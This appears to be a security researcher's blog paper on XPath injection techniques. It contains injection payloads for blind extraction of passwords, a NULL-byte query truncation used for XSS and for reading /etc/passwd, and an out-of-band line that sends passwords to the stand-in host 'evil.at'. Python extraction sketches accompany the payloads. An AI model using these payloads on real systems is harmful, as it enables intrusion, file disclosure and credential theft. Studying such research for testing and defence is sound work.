Modern XPath Exploitation
Now that XML technologies are widely used in modern web applications, XPath injections are becoming more relevant.
Following the release of XPath 2.0 and XPath 3.1, I wanted to see if I could design new attack vectors. It turns out that these new XPath versions introduce new threats and risks that expand the attack surface of XPath vulnerabilities.
The paper is also available as a plain-text file:
http://nzt-48.org/Papers/modern-xpath-exploitation.txt
A tool was released as a proof of concept and you can find it here:
https://github.com/tr3w/injectX
=======================================
Modern XPath Exploitation
=======================================
Ruben V Piña
http://nzt-48.org
@tr3w_
07-20-2023
Abstract
=========
With the introduction of XPath 2.0 and XPath 3.1, many new functions have been
added to XPath. These new functions allow attackers to perform more sophisticated and
powerful attacks than the exploitation techniques that are currently public.
At the time this document was written, all XPath exploitation tools extract information
through very limited techniques such as brute-force.
The purpose of this paper is to optimize the information extraction process as much as
possible and to leverage more lethal attacks such as remote file disclosure, XSS,
turning blind injections into visible injections and others.
An exploitation tool has been written as a proof of concept.
Bisection method
=================
Instead of doing a brute-force attack, it is possible to use a binary search to make
the data extraction process much faster.
Before XPath 2.0, the binary search was performed using the contains() function. This means
that the full character set needs to be sent to the server. When dealing with non-Latin
scripts such as Japanese, this task becomes very tedious.
The new function 'string-to-codepoints' converts any character into its numeric Unicode
code point. The comparison operators "less than (<)" and "greater than (>)" can be combined
with 'string-to-codepoints' to run a binary search that finds each character
faster:
1' and string-to-codepoints(substring(password/text(), 1, 1)) >= %d and
string-to-codepoints(substring(password/text(), 1, 1)) < %d and '1
xcat is the only tool out there that uses this technique. A more advanced and optimized
technique has been designed (see the bitwise section).
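The search loop behind this injection can be sketched in Python. This is a minimal sketch and not the code of any existing tool: `simulated_oracle` is a hypothetical stand-in for the HTTP request that answers the way the vulnerable page would, so the example runs without a target, and the payload template is the injection above with the position arguments of substring() written out.

```python
from typing import Callable

# Template based on the injection above; lo is the inclusive lower bound and
# hi the exclusive upper bound of the code point range being tested.
PAYLOAD = ("1' and string-to-codepoints(substring(password/text(), {pos}, 1)) >= {lo} and "
           "string-to-codepoints(substring(password/text(), {pos}, 1)) < {hi} and '1")


def extract_codepoint(ask: Callable[[int, int], bool],
                      lo: int = 0, hi: int = 0x110000) -> int:
    """Binary search for a code point known to lie in [lo, hi)."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask(lo, mid):   # TRUE response: the code point is in [lo, mid)
            hi = mid
        else:              # FALSE response: the code point is in [mid, hi)
            lo = mid
    return lo


def simulated_oracle(secret: str, pos: int) -> Callable[[int, int], bool]:
    """Hypothetical stand-in for sending the payload and reading TRUE/FALSE."""
    def ask(lo: int, hi: int) -> bool:
        _payload = PAYLOAD.format(pos=pos, lo=lo, hi=hi)  # what would be sent
        return lo <= ord(secret[pos - 1]) < hi
    return ask


def extract_string(secret: str) -> str:
    """Recover every character of the simulated secret, one search per position."""
    return "".join(chr(extract_codepoint(simulated_oracle(secret, pos)))
                   for pos in range(1, len(secret) + 1))
```

With the default bounds the search covers the whole Unicode range and needs at most 21 requests per character; narrowing `lo` and `hi` to the expected alphabet reduces that further.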
RegExp Method
=============
New functions for performing regular expressions were also added to the language. It is
possible to use these functions as another way to implement the bisection method:
1' and matches(substring(password/text(), 1, 1), "[A-Z]") and '1
Request after request, the character range is split in half to narrow down the value of the character being extracted.
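The range-halving loop can be sketched in Python as follows. It is only an illustration under stated assumptions: the character is assumed to be an uppercase letter, `simulated_page` is a hypothetical local stand-in for the vulnerable page, and Python's `re` module is used to evaluate the character class, which behaves the same as XPath's matches() for simple ranges like these.

```python
import re

# Same shape as the injection above; first/last delimit the character class.
PAYLOAD = "1' and matches(substring(password/text(), {pos}, 1), \"[{first}-{last}]\") and '1"


def build_payload(pos, first, last):
    return PAYLOAD.format(pos=pos, first=first, last=last)


def find_letter(page_is_true, pos=1, first="A", last="Z"):
    """Halve the range [first, last] until a single character is left."""
    lo, hi = ord(first), ord(last)
    while lo < hi:
        mid = (lo + hi) // 2
        if page_is_true(build_payload(pos, chr(lo), chr(mid))):
            hi = mid          # the character is in the lower half
        else:
            lo = mid + 1      # the character is in the upper half
    return chr(lo)


def simulated_page(secret):
    """Hypothetical target: parses the payload and answers TRUE or FALSE."""
    shape = re.compile(r'\(\), (\d+), 1\), "(\[.-.\])"\)')

    def page_is_true(payload):
        pos, char_class = shape.search(payload).groups()
        return re.fullmatch(char_class, secret[int(pos) - 1]) is not None
    return page_is_true
```

For the 26 uppercase letters this takes at most 5 requests per character, compared to up to 26 with a plain brute-force comparison.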
Bitwise methods
===============
In 2010, binary-based methods were invented to extract information through SQL injection in an extremely optimized fashion. These methods extract each character in its numeric binary representation, bit by bit. If the page responds with a TRUE response, it means that the bit in question is a 1. In any other case, the bit being extracted is equal to 0.
(97 / 0x01 % 0x02) = 1 TRUE
(97 / 0x02 % 0x02) = 0 FALSE
(97 / 0x04 % 0x02) = 0 FALSE
(97 / 0x08 % 0x02) = 0 FALSE
(97 / 0x10 % 0x02) = 0 FALSE
(97 / 0x20 % 0x02) = 1 TRUE
(97 / 0x40 % 0x02) = 1 TRUE
(97 / 0x80 % 0x02) = 0 FALSE
-----------------------
01100001 = 97 = a (bits read from bottom to top)
The advantage of this method is that every request is independent of the others, in
contrast to the bisection method, in which each request depends on the answer to the previous one and must be sent sequentially. Thus, all the requests can be sent at once with threads, which means that the desired character is obtained around 7 times faster than with the bisection method because all the bits are requested at the same time. The injection looks like the following:
1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1
Since XPath doesn't implement any bitwise operators yet, each individual bit is
calculated by dividing the code point by a power of 2 (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40), taking the floor of the result, and then calculating that value modulo 2.
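The following Python sketch shows how the independent bit requests can be issued in parallel and reassembled. It is a hedged illustration, not the released tool: `simulated_request` is a hypothetical function that stands in for the HTTP request and computes the answer locally, and 7 bits are requested per character, which only covers ASCII.

```python
from concurrent.futures import ThreadPoolExecutor

# The injection shown above, with the position and the power of 2 as parameters.
PAYLOAD = ("1'and(floor(string-to-codepoints(substring(password/text(),{pos},1))"
           "div {divisor})mod 2)and'1")


def simulated_request(secret, pos, divisor):
    """Hypothetical stand-in for one request; True means the bit is 1."""
    _payload = PAYLOAD.format(pos=pos, divisor=divisor)  # what would be sent
    return (ord(secret[pos - 1]) // divisor) % 2 == 1


def extract_char(secret, pos, bits=7):
    """Request every bit of one character concurrently and rebuild it."""
    divisors = [1 << i for i in range(bits)]  # 0x01, 0x02, ..., 0x40
    with ThreadPoolExecutor(max_workers=bits) as pool:
        # No request depends on another, so all of them run at the same time.
        answers = list(pool.map(lambda d: simulated_request(secret, pos, d),
                                divisors))
    code = sum(d for d, bit_is_set in zip(divisors, answers) if bit_is_set)
    return chr(code)
```

Raising `bits` (for example to 21) would cover code points outside ASCII at the cost of more requests per character.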
Detection Phase Optimization
============================
Blind XPath injections can happen in single quoted strings, double quoted strings and
numeric contexts.
Usually, 3 injections must be made to find out the context of the vulnerable
parameter:
and '1'='1
and "1"="1
and 1
This can be improved by using just one injection with a polyglot vector that works in every possible scenario. Instead of making 3 requests, just 1 is done.
and 1 (: ' and " and '"!='!=":)
and 0 (: ' and " and '"='=":)
Comments in XPath need to be opened and closed with the (: :) delimiters.
Turn XPath Injections into Cross-Site-Scripting
==================================================
Instead of returning nodes with XPath, it is also possible to return specific strings
defined by the user:
//users/"this text will be printed"
Although it is possible in principle to change an XPath query by injecting more code, most of the time this fails because there is always trailing text after the injected value:
//users/username[username/text()='admin']/"print this text" ']/password
As you can see, the only way to inject arbitrary text and have it displayed
is to break out of the predicate by closing the quote and the bracket, and then
modify the rest of the query at will. However, the trailing text after
the injection is a problem because it yields invalid code or increases the
complexity of the injection.
In contrast to SQL, there are no single line comments such as -- and # to ignore
the trailing text.
However, I found an undocumented behavior in XPath that is useful for commenting out
trailing text: placing a NULL byte after the injection. This terminates the query string, so everything that follows is ignored and the attacker controls the output:
//users/username[username/text()='admin']/""%00']/password
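With markup such as a script element placed inside the quoted string, that line turns the XPath injection into an XSS attack, provided the application writes the query result into the page without encoding it.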
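The effect of the NULL byte on the final query can be modelled in a few lines of Python. This is only a sketch under assumptions: `TEMPLATE` is a hypothetical server-side query, and `effective_query` simulates the truncation reported above instead of calling a real XPath engine.

```python
from urllib.parse import quote

# Hypothetical server-side template; the real one is unknown to the attacker.
TEMPLATE = "//users/username[username/text()='{}']/password"


def build_query(user_input: str) -> str:
    """Concatenate the user input into the query, as the vulnerable code would."""
    return TEMPLATE.format(user_input)


def effective_query(query: str) -> str:
    """Model of the reported behaviour: everything from the NULL byte on is ignored."""
    return query.split("\x00", 1)[0]


# Close the quote and the bracket, return a string, then cut off the trailing text.
injection = "admin']/\"print this text\"\x00"
url_value = quote(injection)  # the NULL byte travels as %00 in the request
```

Here `effective_query(build_query(injection))` yields `//users/username[username/text()='admin']/"print this text"`, which is the query without its trailing `']/password`.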
Comments about implementation differences
-----------------------------------------
As this NULL byte behavior doesn't appear in the XPath specifications, it is very
likely that it works only in certain XPath implementations.
I tested it in the Saxon implementation by Saxonica (http://saxonica.com), but I have not
had the chance to test it in other implementations.
It would be interesting to find out whether the NULL byte terminator works in all XPath
implementations. If someone wants to contribute by testing the NULL byte in other
implementations, the help would be highly appreciated.
List of other XPath Implementations:
https://en.wikipedia.org/wiki/XPath#Implementations
Turning Blind Injections Into Visible Injections
================================================
Because there is trailing text after the injection point, the only way to extract nodes other than the ones intended to be displayed used to be blind boolean injection.
After seeing how the NULL byte trick works, it is only logical to conclude that the
entire query can be changed and any desired node can be displayed by escaping from
the predicate brackets and adding other selectors at the end, followed by a NULL byte
that makes the parser ignore the rest of the original query, so that the attacker's
expression is evaluated instead:
//username[username/text()='admin']/CreditCartNumber/text()%00']/original-query
Arbitrary File Disclosure
=========================
XPath can also be exploited to disclose the contents of arbitrary files on the server.
This is achieved with the new unparsed-text() function. The blind injection can be turned into a visible one by using the NULL byte trick to modify the query and ignore the rest of the original. Thus, the contents of the target file are revealed in a single response.
//user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters
The unparsed-text() function reads the file and returns its entire contents as a string.
Sometimes (depending on the XPath implementation) static-base-uri() returns an empty string, which means that relative URIs cannot be used and absolute paths are needed instead; this can be an obstacle. The function base-uri() can be used to print the location of the static resource:
//user[user/text()='break']/base-uri()%00']
The document-uri() function can also be used for this.
If it is not possible to make the blind injection visible, the contents of files on the server can be extracted character by character through the bitwise extraction method.
It is worth noting that at the time this was written, xcat (the most popular tool nowadays) had recently been updated to include this functionality. However, when I tested it, this module had a lot of bugs and didn't work most of the time (at least on my computer).
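The character-by-character extraction of a file can be sketched by combining the bitwise injection with unparsed-text(). The Python below is an illustration under assumptions, not the code of xcat or of the released tool: the payload is my own combination of the two injections shown in this paper, `make_simulated_target` is a hypothetical in-memory stand-in for the vulnerable page, and the file length is passed in explicitly instead of being discovered.

```python
import re

# Bitwise injection applied to the contents of a file instead of a node.
PAYLOAD = ("1'and(floor(string-to-codepoints(substring(unparsed-text('{path}'),"
           "{pos},1))div {divisor})mod 2)and'1")


def file_bit_payload(path: str, pos: int, bit: int) -> str:
    """Payload that is TRUE when the given bit of character `pos` is 1."""
    return PAYLOAD.format(path=path, pos=pos, divisor=1 << bit)


def read_blind(send, path: str, length: int, bits: int = 7) -> str:
    """Rebuild `length` characters of the file from TRUE/FALSE answers."""
    chars = []
    for pos in range(1, length + 1):
        code = sum(1 << b for b in range(bits)
                   if send(file_bit_payload(path, pos, b)))
        chars.append(chr(code))
    return "".join(chars)


def make_simulated_target(files: dict):
    """Hypothetical target that answers from an in-memory 'file system'."""
    shape = re.compile(r"unparsed-text\('([^']*)'\),(\d+),1\)\)div (\d+)\)")

    def send(payload: str) -> bool:
        path, pos, divisor = shape.search(payload).groups()
        return (ord(files[path][int(pos) - 1]) // int(divisor)) % 2 == 1
    return send
```

Against a real target, `send` would issue the HTTP request and compare the response with the known TRUE page; the bit requests for each character could also be sent in parallel.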
Server-Side Request Forgery
===========================
It is also possible to force the XPath processor to send requests to any server by passing an HTTP
URL to the doc(), doc-available(), unparsed-text() or unparsed-text-available() functions. The vulnerable server makes the request, so it is executed on the server's behalf.
Out-Of-Band Attacks
========================
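The same functions can be used to exfiltrate data out of band: the extracted value is appended to a URL on a server controlled by the attacker, where it shows up in the request log:
//user[user/text()='break']/unparsed-text(concat('http://evil.at/?x=',//password))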
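On the receiving side, the leaked value only needs to be read back from the request that reaches the attacker's server. The Python sketch below is a minimal illustration: `oob_payload` and `leaked_value` are hypothetical helper names, the parameter name `x` comes from the example above, and the request target is assumed to be taken from the web server's access log.

```python
from urllib.parse import urlsplit, parse_qs


def oob_payload(collector: str, xpath_expr: str) -> str:
    """Build the expression that makes the target request collector?x=<data>."""
    return "unparsed-text(concat('{}?x=',{}))".format(collector, xpath_expr)


def leaked_value(request_target: str):
    """Return the value of the x parameter from a logged request target."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    values = params.get("x")
    return values[0] if values else None
```

For example, `leaked_value("/?x=s3cr3t")` returns `"s3cr3t"`. Values containing characters that are not valid in a URL may arrive mangled; wrapping the extracted expression in the standard encode-for-uri() function is one way to avoid that.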
Proof Of Concept
================
An XPath exploitation tool which implements the bitwise bit-anding method has been written.
http://nzt-48.org/tools/
Appendix
========
You can find the XPath specifications here:
https://www.w3.org/TR/xpath-functions-31/
Links to other XPath injection tools (most of them are very old):
xcat
https://github.com/orf/xcat
xxxpwn
https://github.com/feakk/xxxpwn
xpath-blind-explorer
https://github.com/micsoftvn/xpath-blind-explorer
XMLCHOR
https://github.com/Harshal35/XMLCHOR/
Filed under: Hacking,Web Application Security - @ 2023-07-21 02:13
Tags: injection